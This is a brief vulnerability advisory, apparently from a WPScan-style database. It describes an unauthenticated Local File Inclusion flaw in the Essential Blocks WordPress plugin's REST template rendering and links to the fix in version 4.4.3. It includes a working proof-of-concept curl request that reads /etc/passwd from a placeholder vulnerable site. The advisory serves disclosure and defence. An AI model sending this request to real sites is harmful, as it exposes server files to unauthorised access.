6.5 Medium
AI Score
Confidence
High
0.071 Low
EPSS
Percentile
94.0%
Description The plugin does not prevent unauthenticated attackers from overwriting local variables when rendering templates over the REST API, which may lead to Local File Inclusion attacks.
curl --url ‘http://vulnerable-site.tld/wp-json/essential-blocks/v1/queries?block_type=nonexisting_block&query;_data={“source”%3A+“post”}&attributes;={“__file”%3A+“%2Fetc%2Fpasswd”}’
wpscan.com/blog/file-inclusion-vulnerability-fixed-in-essential-blocks-4-4-3/